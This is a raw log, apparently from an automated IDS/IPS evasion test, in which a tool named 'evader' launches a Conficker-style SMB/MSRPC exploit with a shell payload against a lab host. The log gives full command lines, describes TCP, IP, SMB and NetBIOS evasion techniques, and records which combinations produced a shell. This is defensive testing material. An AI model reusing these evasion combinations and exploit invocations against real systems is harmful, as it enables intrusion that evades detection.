- - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload.
- Info: NetBIOS connection 10.62.90.113:12055 -> 10.35.1.207:445
- Terminated
- .
- 27771 runs averaging 1.77 runs / second ; progress: 15720/43200.
- 27772 runs averaging 1.77 runs / second ; progress: 15725/43200....2015-11-29 18:47:59 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51361 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=9FEgSgu5vcw --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"2","2","3","random" --evasion=[smb_opentree,end]tcp_paws,"5","8","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 9FEgSgu5vcz
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before normal SMB writes, 2 SMB trees are opened and 2 writes are performed to them. The write payload is 3 random bytes.
- Info: NetBIOS connection 10.62.90.117:51361 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 27782 runs averaging 1.77 runs / second ; progress: 15730/43200....................
- 27802 runs averaging 1.77 runs / second ; progress: 15735/43200...................2015-11-29 18:48:09 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58603 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=zQrV9wU4W2Q --evasion=[smb_connect,end]smb_decoytrees,"2","6","2","random_msrpcreq" --evasion=[smb_openpipe,end]tcp_overlap,"774","new","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed zQrV9wU4W2T
- The following evasions are applied from stage smb_connect to end:
- - Before normal SMB writes, 2 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to end:
- - TCP segments are set to overlap by 774 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.111:58603 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 27825 runs averaging 1.77 runs / second ; progress: 15740/43200.2015-11-29 18:48:11 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58902 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=GGyhVeoye7M --evasion=[smb_connect,msrpc_bind]tcp_chaff,"3","chksum|nullflag|outofwindow|shorthdr|longhdr","zero" --evasion=[start,end]tcp_paws,"3","36687720","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed GGyhVeoye7M
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 36687720> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.113:58902 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .........
- 27836 runs averaging 1.77 runs / second ; progress: 15745/43200......
- 27842 runs averaging 1.77 runs / second ; progress: 15750/43200.2015-11-29 18:48:22 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62003 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=6hxXZxV/TQc --evasion=[netbios_connect,smb_opentree]tcp_chaff,"21","outofwindow|longhdr","shuffle" --evasion=[start,msrpc_req]tcp_paws,"50%","257032956","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 6hxXZxV/TQf
- The following evasions are applied from stage start to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 257032956> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * An out-of-window sequence number.
- * TCP header longer than packet total size
- * Duplicate packet has shuffled original payload
- Info: NetBIOS connection 10.62.90.110:62003 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..........
- 27854 runs averaging 1.77 runs / second ; progress: 15755/43200..........
- 27864 runs averaging 1.77 runs / second ; progress: 15760/43200.........
- 27873 runs averaging 1.77 runs / second ; progress: 15765/43200......2015-11-29 18:48:39 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17936 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=4nL4a4IvLH0 --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","3","random_alphanum" --evasion=[smb_connect,smb_openpipe]tcp_seg,"9" --verifydelay=1000 --payload=shell
- Info: Using random seed 4nL4a4IvLH3
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - TCP packets are segmented to contain at most 9 bytes of payload.
- Info: NetBIOS connection 10.62.90.113:17936 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 27884 runs averaging 1.77 runs / second ; progress: 15770/43200.............
- 27897 runs averaging 1.77 runs / second ; progress: 15775/43200...................
- 27916 runs averaging 1.77 runs / second ; progress: 15780/43200......2015-11-29 18:48:54 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10147 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=QPbox6bWoBI --evasion=[smb_connect,end]tcp_overlap,"1479","new","random" --evasion=[netbios_connect,end]tcp_paws,"25%","215976190","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed QPbox6bWoBJ
- The following evasions are applied from stage netbios_connect to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 215976190> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_connect to end:
- - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has random bytes as payload
- Info: NetBIOS connection 10.62.90.117:10147 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 27925 runs averaging 1.77 runs / second ; progress: 15785/43200....2015-11-29 18:48:58 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52189 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=4Fl3WpOMNK8 --evasion=[start,msrpc_req]tcp_paws,"75%","6","alphanumrandomized" --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed 4Fl3WpOMNK/
- The following evasions are applied from stage start to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.117:52189 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....2015-11-29 18:49:00 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56280 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=JDm6ToN1zLk --evasion=[smb_connect,end]tcp_paws,"1","3","alphanumrandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","117704364","shuffle" --evasion=[netbios_connect,end]tcp_recv_window,"7" --verifydelay=1000 --payload=shell
- Info: Using random seed JDm6ToN1zLk
- The following evasions are applied from stage netbios_connect to end:
- - TCP receive window is set to at most 7 bytes.
- The following evasions are applied from stage smb_connect to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 117704364> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.117:56280 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 27938 runs averaging 1.77 runs / second ; progress: 15790/43200................
- 27954 runs averaging 1.77 runs / second ; progress: 15796/43200..........
- 27964 runs averaging 1.77 runs / second ; progress: 15801/43200..
- 27966 runs averaging 1.77 runs / second ; progress: 15806/43200
- 27966 runs averaging 1.77 runs / second ; progress: 15811/43200........
- 27974 runs averaging 1.77 runs / second ; progress: 15816/43200......2015-11-29 18:49:31 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34127 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=EwCILbJtpug --evasion=[start,smb_openpipe]ipv4_opt,"13","inc","random_alphanum" --evasion=[smb_opentree,end]tcp_paws,"50%","101597375","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed EwCILbJtpug
- The following evasions are applied from stage start to smb_openpipe:
- - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 101597375> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.112:34127 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- 27981 runs averaging 1.77 runs / second ; progress: 15821/43200..
- 27983 runs averaging 1.77 runs / second ; progress: 15826/43200...
- 27986 runs averaging 1.77 runs / second ; progress: 15831/43200.......
- 27993 runs averaging 1.77 runs / second ; progress: 15836/43200.............2015-11-29 18:49:51 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56329 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=xqffTOxhPHs --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"21","chksum|nullchksum|outofwindow","shuffle30" --evasion=[smb_opentree,end]tcp_paws,"3","268435455","random" --verifydelay=1000 --payload=shell
- Info: Using random seed xqffTOxhPHv
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * An out-of-window sequence number.
- * Duplicate packet has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage smb_opentree to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.110:56329 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 28008 runs averaging 1.77 runs / second ; progress: 15841/43200...2015-11-29 18:49:52 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18237 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=6JjWlAliJfs --evasion=[netbios_connect,smb_connect]netbios_chaff,"50%","http_post" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 6JjWlAliJfv
- The following evasions are applied from stage netbios_connect to smb_connect:
- - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload.
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.110:18237 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....2015-11-29 18:49:54 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49837 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=QkN3JKTYqig --evasion=[start,msrpc_req]tcp_paws,"2","3","alphanumrandomized" --evasion=[netbios_connect,smb_opentree]tcp_paws,"1","9","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed QkN3JKTYqih
- The following evasions are applied from stage start to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.117:49837 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .......
- 28025 runs averaging 1.77 runs / second ; progress: 15846/43200.............
- 28038 runs averaging 1.77 runs / second ; progress: 15851/43200...........
- 28049 runs averaging 1.77 runs / second ; progress: 15856/43200..........
- 28059 runs averaging 1.77 runs / second ; progress: 15861/43200.........
- 28068 runs averaging 1.77 runs / second ; progress: 15866/43200..
- 28070 runs averaging 1.77 runs / second ; progress: 15871/43200
- 28070 runs averaging 1.77 runs / second ; progress: 15876/43200Pid 5217 timed out - killed
- 2015-11-29 18:50:28 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19081 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=iIUPNOtp5Ls --evasion=[smb_connect,end]tcp_chaff,"13","longhdr","random" --evasion=[smb_openpipe,end]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
- Info: Using random seed iIUPNOtp5Lu
- The following evasions are applied from stage smb_connect to end:
- - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * TCP header longer than packet total size
- * Duplicate packet has random bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.115:19081 -> 10.35.1.207:445
- Terminated
- 28071 runs averaging 1.77 runs / second ; progress: 15881/43200.....
- 28076 runs averaging 1.77 runs / second ; progress: 15886/43200.....
- 28081 runs averaging 1.77 runs / second ; progress: 15891/43200......2015-11-29 18:50:45 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50648 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=f19n/w1BjR8 --evasion=[smb_openpipe,msrpc_bind]smb_decoytrees,"4","5","2047","random" --evasion=[msrpc_bind,end]tcp_paws,"1","33510158","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed f19n/w1BjR9
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Before normal SMB writes, 4 SMB trees are opened and 5 writes are performed to them. The write payload is 2047 random bytes.
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 33510158> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.110:50648 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 28090 runs averaging 1.77 runs / second ; progress: 15896/432002015-11-29 18:50:51 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26041 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=sl7m0GwAntw --evasion=[smb_connect,msrpc_bind]ipv4_opt,"5","inc","random_alphanum" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"6","2","7","random_msrpcreq" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"6","5","4","random" --verifydelay=1000 --payload=shell
- Info: Using random seed sl7m0GwAnty
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 2 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 5 writes are performed to them. The write payload is 4 random bytes.
- Info: NetBIOS connection 10.62.90.110:26041 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- 28091 runs averaging 1.77 runs / second ; progress: 15901/43200.....
- 28096 runs averaging 1.77 runs / second ; progress: 15906/43200.......
- 28103 runs averaging 1.77 runs / second ; progress: 15911/43200........
- 28111 runs averaging 1.77 runs / second ; progress: 15916/43200
- 28111 runs averaging 1.77 runs / second ; progress: 15921/43200
- 28111 runs averaging 1.77 runs / second ; progress: 15926/43200...
- 28114 runs averaging 1.76 runs / second ; progress: 15931/43200....
- 28118 runs averaging 1.76 runs / second ; progress: 15936/43200...2015-11-29 18:51:31 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63136 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=HrVWX3wtaqA --evasion=[smb_connect,smb_opentree]smb_chaff,"2","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","170135684","random" --evasion=[msrpc_bind,msrpc_req]tcp_urgent,"3","random" --verifydelay=1000 --payload=shell
- Info: Using random seed HrVWX3wtaqA
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Before every 2th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 170135684> and has random bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Add a random urgent data byte to every 3 TCP segment.
- Info: NetBIOS connection 10.62.90.110:63136 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 28123 runs averaging 1.76 runs / second ; progress: 15941/43200......
- 28129 runs averaging 1.76 runs / second ; progress: 15946/43200.Pid 6900 timed out - killed
- 2015-11-29 18:51:38 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51735 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=yAsyNYuc8v4 --evasion=[msrpc_bind,msrpc_req]smb_chaff,"2","write_flag","alphanum" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","5","562","random_alphanum" --evasion=[smb_connect,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed yAsyNYuc8v7
- The following evasions are applied from stage smb_connect to end:
- - 25% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 562 random alphanumeric bytes.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before every 2th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
- Info: NetBIOS connection 10.62.90.118:51735 -> 10.35.1.207:445
- Terminated
- ......
- 28137 runs averaging 1.76 runs / second ; progress: 15951/43200Pid 6977 timed out - killed
- 2015-11-29 18:51:44 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47476 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=isRm9W2VVvw --evasion=[start,netbios_connect]tcp_paws,"1","2","alpharandomized" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed isRm9W2VVvy
- The following evasions are applied from stage start to netbios_connect:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.114:47476 -> 10.35.1.207:445
- Terminated
- ....
- 28142 runs averaging 1.76 runs / second ; progress: 15956/43200
- 28142 runs averaging 1.76 runs / second ; progress: 15961/43200Pid 7270 timed out - killed
- 2015-11-29 18:51:53 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58090 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=Hgg7DheMpXo --evasion=[smb_opentree,msrpc_req]tcp_chaff,"2","chksum|nullchksum|nullflag","alphanumrandomized" --evasion=[smb_openpipe,end]tcp_chaff,"3","chksum|nullchksum|nullflag|outofwindow|shorthdr","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed Hgg7DheMpXo
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * NULL TCP control flags.
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_openpipe to end:
- - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * Duplicate packet has random alphanumeric bytes as payload
- - 50% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.119:58090 -> 10.35.1.207:445
- Terminated
- Pid 7300 timed out - killed
- 2015-11-29 18:51:54 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13639 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=QiqTvuFtUiA --evasion=[smb_opentree,end]ipv4_opt,"13","inc","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed QiqTvuFtUiB
- The following evasions are applied from stage smb_opentree to end:
- - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphabetic characters are randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random alphanumeric urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.116:13639 -> 10.35.1.207:445
- Terminated
- ......
- 28150 runs averaging 1.76 runs / second ; progress: 15966/43200.......
- 28157 runs averaging 1.76 runs / second ; progress: 15971/43200.......
- 28164 runs averaging 1.76 runs / second ; progress: 15976/43200..........
- 28174 runs averaging 1.76 runs / second ; progress: 15981/43200..............
- 28188 runs averaging 1.76 runs / second ; progress: 15986/43200............2015-11-29 18:52:22 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43646 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=SZGGJgzT8+g --evasion=[start,smb_connect]tcp_paws,"8","1","shuffle30" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","268435455","random" --verifydelay=1000 --payload=shell
- Info: Using random seed SZGGJgzT8+h
- The following evasions are applied from stage start to smb_connect:
- - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.116:43646 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 28202 runs averaging 1.76 runs / second ; progress: 15991/43200...............
- 28217 runs averaging 1.76 runs / second ; progress: 15996/43200.2015-11-29 18:52:27 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=65461 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Msb/Ot5EHnw --evasion=[smb_openpipe,msrpc_req]ipv4_frag,"24" --evasion=[start,end]tcp_paws,"3","6","alpharandomized" --evasion=[smb_opentree,msrpc_bind]tcp_seg,"1" --verifydelay=1000 --payload=shell
- Info: Using random seed Msb/Ot5EHnw
